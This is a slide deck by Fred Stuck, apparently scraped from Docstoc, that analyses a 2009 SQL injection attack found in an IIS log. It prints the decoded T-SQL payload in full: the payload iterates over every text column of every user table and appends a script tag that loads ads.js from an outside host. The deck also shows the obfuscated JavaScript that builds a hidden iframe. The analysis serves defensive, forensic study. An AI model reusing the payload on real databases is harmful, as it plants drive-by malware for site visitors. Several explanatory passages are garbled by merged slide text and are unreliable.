SQL Injection Attack Overview

Document Sample
SQL Injection Attack Overview Powered By Docstoc
					SQL Injection Attack
Step by step analysis of a
SQL Injection attack
   Code Obfuscation a Definition
   IIS Log Entry
   Decoding the HEX Part 1
   SQL Injection Code
   Decoding the HEX Part 2
   Injected Code
   Where is this coming from?
Code Obfuscation a Definition
   “Obfuscated code is source or machine code
    that has been made difficult to understand.
    Programmers may deliberately obfuscate code
    to conceal its purpose (a form of security
    through obscurity), to deter reverse
    engineering, or as a puzzle or recreational
    challenge for readers. Programs known as
    obfuscators transform human-readable code
    into obfuscated code using various techniques.”
                                                    This is the IIS log that is generated during the
                                                    attack. In the next slide we remove the URL

IIS Log Entry
                                                    encoding and make the information highlighted
                                                    in yellow more readable.

   \\web101\Logs$\IIS\W3SVC1\u_ex090926.log:2009-09-26 16:41:23 W3SVC1 WEB101
    GET /client/file.asp adid=24&category=Texas+03-
    Ar(4000));exEc(@S);-- 80 - HTTP/1.1
    Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - 200 0 0 13542 1641 1015
                     After removing the URL encoding and adding some line feeds we have the following
                     code. The cast statement converts the log HEX string into a Variable Character Field
                     (varchar). Next the EXEC command executes this decoded string.

IIS Log Entry - Removing URL Encoding

                                                   CAST: Translates the
   /client/file.asp
   adid=24&category=Texas 03-04/08;           HEX expression into a
   DECLARE @s VaRcHAr(4000);                  character string
   SET @S=casT(
    736F5220 aS varcHAr(4000));
   exEc(@S);
                  EXEC: Executes this string
                                  This causes through HEX of the columns and interesting stringto attack sysobject and
                                  Herequery in the encoded HEXitscode uses an appends a we applyeach the entire string
                                  It then loops the the all of these vary significantly Once trick to it to and This
                                  The we decode begining into to ASCII equivalent. from attack by using row. is an
                                  syscolumns, special tables to point Server.
                                  attempt also full detection. within SQL look at The query selects all slide.
                                  we haveto avoid code. in HEX. We willout that this code is in the next User defined
                                  string is the encoded I’d like                       further somewhat dynamic in
                                  tables You can see variety of upper datatypes that can hold a in the of characters.
                                  nature.and then limitsait to columns withand lower case characters string code.

    Decoding the HEX part 1
                                                     sysobjects: Contains one row          syscolumns: Contains one
                                                     for each object (constraint,          row for every column in every
                                                     default, log, rule, stored            table and view, and a row for
           0x4445436C41724520405420564152434861…    procedure, and so on) created         each parameter in a stored
       DEClArE @T VARCHar(255),@c VaRChaR(255)
                  0x44 = 68 = D                     within a database.                    procedure. This table is in each
       dEclAre taBLe_cuRsoR CURSoR
                  0x45 = 69 = E                                                           database.
        fOr SElECt, FroM sysobjECts a, sYsCOlUMns b
                  0x43 = 67 = C
        where aNd A.XTyPE='u' aND (b.XtyPe=99 oR b.XTypE=35 or B.XtyPe=231 Or B.XtYpE=167)
                  0x6C = 108 = l
       OpEn tABlE_CURsOr
                  0x41 = 65 = A
       FEtcH Next From tAbLe_CUrsOR INTo @T,@c                                      XType:
                  0x72 = 114 = r
        whilE(@@FETch_STAtUS=0)                                                     U = User table
                  0x45 = 69 = E
         Begin                                                                      35 = text
                  0x20 = 32 =
          ExEc('UpdaTe ['+@T+']                                                     99 = ntext
                  0x40 = 64 = @
           SEt ['+@C+']=                                                            167 = varchar
                  0x54 = 84 = T
            RTRiM(COnVert(VArCHAR(4000),['+@C+']))+                                 231 = nvarchar
                  0x20 = 32 =
            CAST(0X3C736372697074207372633D687474703A2F2F7777772E6
                  0x56 = 86 = V
             2616E6E6572742E72752F6164732E6A733E3C2F7363726970743E
                  0x41 = 65 = A
            as vARCHAr(51))')
                  0x52 = 82 = R
          FetcH NeXt FROM TAbLE_cUrsor iNtO @t,@C
                  0x43 = 67 = C
         EnD
                  0x48 = 72 = H
       ClOse TAbLE_Cursor
                  0x61 = 97 = a
       dEALlOcATE TABLe_CURsoR
                        Using the same method as before we very easily determine that the injected string is a
                        script tag pointing to ads.js. I have also experienced changes to this URL from attack
                        to attack. I have decoded about four different locations for ads.js as of this writing.

Decoding the HEX part 2
   0x3C736372697074207372633D687474703A2F2F7777772E626

   <script src=></script>
                         Since most of the code within ads.js is not utilized I’ll stick with what is. The first part is
                         The two functions within the write statement are very similar so I will only explain one
                         of interesting way of hiding the their differences are.
                         anthem but I will indicate where write command. They utilize the replace function to
                         remove the 5 from within the string literal concealing it from detection.

Injected Code – Java Script
   <script src=></script>

   document['wri5te'.replace(/[0-9]/,'')](RfCEPXiV('imLQjGIUbV')+hesXRonvzA('yJodBRbANq'));

   write(RfCEPXiV('imLQjGIUbV')+hesXRonvzA('yJodBRbANq'));
                          Nextnext stepof this the code to set up an array basedThese variables howeveronly the
                                it loops is for each of these some variables. on the cipher are the on
                          The first part throughfunction sets upelements and splits it once againtext split on the
                          differences between the two functions. The first two areand determines the resultant
                          plus sign. It then performs first array element would be a decryption key and the last
                          commas. For example the the decryption mathematics 90+0.
                          is the cipher text.

Injected Code – Java Script
                 <iframe width=1 height=1 border=0 frameborder=0 s

function RfCEPXiV(KDZJF){
var Ffwx=6,
var VhoWIRnEH='90+0,157+2,153+0,171+0,145+2,163+2,151+2,48+0,178+2,157+2,
QlnGAowZ=VhoWIRnEH.split(','); Splits the string at the commas
                                                                                90*4 + 0 = 360
                                                                                157*4 + 2 = 630
      MhbtCwq=QlnGAowZ[THLfo].split('+'); Splits the string at the plus
                                                                                153*4 + 0 = 612
      gAJys = parseInt(MhbtCwq[0]*TMplSKEfAW)+parseInt(MhbtCwq[1]);
                                                                                171*4 + 0 = 684
      gAJys = parseInt(gAJys)/Ffwx;
                                             360/6 = 60           60 = <        145*4 + 2 = 582
      gHuP += String.fromCharCode(gAJys);
                                             630/6 = 105          105 = i       …
return gHuP;}                                612/6 = 102          102 = f
                                          684/6 = 114        114 = r
                                          582/6 = 97         97 = a
                                          …                  …
                         The results form both functions result in an iframe which loads index.php. At this point I
                         stopped my investigation partly because the index.php file returned a Page Not Found
                         error. As noted bellow there are three possible conditions at this point.

Injected Code – php & css
   <iframe width=1 height=1 border=0 frameborder=0 src='http://ads-'></iframe>

   Index.php simulates an „Error 404 - Page Not Found‟ however it has custom Java Script as well
    as a cascading style sheet which specifies background images.

   One of three conditions exist.
        This site has been identified as malicious and has been removed from the hosting provider
        The images specified in the CSS could be malicious in nature.
        They have not activated the malicious code and could do so at anytime.
                         By performingperforms a Google search for a Storm that would IIS provided can a link
                         The some communications with the address identified in I was logs a vulnerable
                         Afterprogram a WhoIs on the sourceInternet string Center the indicate we with
                         determine entry this Aprilthe attack (click here to from it). The handlers at thefor other
                         site diary that for particular attack originated
                         to a and then executes 16, 2008 against them.see Taiwan. IP addresses ISC actually
                         attacks varied in origin however so far all havethat utilizes from Asia. identify sites that
                         have the code (apparently written in Chinese) originated Google to
                         are vulnerable to this attack.

Where is this coming from?
               inetnum: -
               netname:      SEEDNET-NET
               descr:     Digital United Inc.
               descr:     7F,220,gangchi road
               descr:     Taipei Taiwan 114
               country:    TW
               admin-c:    MC37-AP
               tech-c:    MC37-AP
               status:    ALLOCATED PORTABLE
               mnt-by:     MAINT-TW-TWNIC
               mnt-lower: MAINT-TW-TWNIC
               mnt-routes: MAINT-TW-TWNIC
               remarks:     -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
               remarks:     This object can only be updated by APNIC hostmasters.
               remarks:     To update this object, please contact APNIC
               remarks:     hostmasters and include your organisation's account
               remarks:     name in the subject line.
               remarks:     -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
               changed: 20061228
               source:    APNIC
SQL Injection Attack

   Thank you for watching
         Fred Stuck

Shared By: